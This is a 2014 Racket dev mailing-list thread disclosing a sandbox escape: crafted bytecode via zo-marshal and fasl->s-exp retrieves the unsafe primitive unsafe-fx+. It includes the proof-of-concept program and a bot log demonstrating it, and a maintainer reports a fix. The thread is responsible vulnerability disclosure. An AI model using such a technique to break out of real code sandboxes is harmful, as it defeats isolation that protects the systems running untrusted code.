[racket-dev] racket/fasl allows sandbox escape

From: Sam Tobin-Hochstadt (samth at cs.indiana.edu)
Date: Thu Jul 10 07:13:25 EDT 2014

Credit for this discovery goes to Jens -- I just wrote the email.

Sam
On Jul 10, 2014 2:36 AM, "Matthew Flatt" <mflatt at cs.utah.edu> wrote:

> I've pushed a repair. To double-check it, change 1140 to something like
> 1340, since the table of primitives changed as part of the repair.
>
> Thanks for the report!
>
> At Wed, 9 Jul 2014 09:39:50 -0400, Sam Tobin-Hochstadt wrote:
> > The following exchange with rudybot, which is running the programs in
> > a sandbox, demonstrates the issue:
> >
> > 09:35 <samth> rudybot: eval (let () (local-require compiler/zo-marshal
> > compiler/zo-structs racket/fasl) (fasl->s-exp (zo-marshal
> > (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t (install-value 1
> > 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
> > 09:35 <rudybot> samth: ; Value: #<procedure:unsafe-fx+>
> > 09:36 <samth> rudybot: eval ((let () (local-require
> > compiler/zo-marshal compiler/zo-structs racket/fasl) (fasl->s-exp
> > (zo-marshal (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t
> > (install-value 1 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
> > vector-ref vector-ref)
> > 09:36 <rudybot> samth: ; Value: 32681168
> >
> > The relevant program is:
> >
> > (let ()
> >   (local-require compiler/zo-marshal compiler/zo-structs racket/fasl)
> >   (fasl->s-exp (zo-marshal
> >                       (compilation-top 3
> >                          (prefix 0 '() '())
> >                          (let-void 1 #t (install-value 1 0 #t (primval
> > 1140) (localref #t 0 #f #f #f )))))))
> >
> > Sam
> > _________________________
> >   Racket Developers list:
> >   http://lists.racket-lang.org/dev
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.racket-lang.org/dev/archive/attachments/20140710/9273567c/attachment.html>

Posted on the dev mailing list.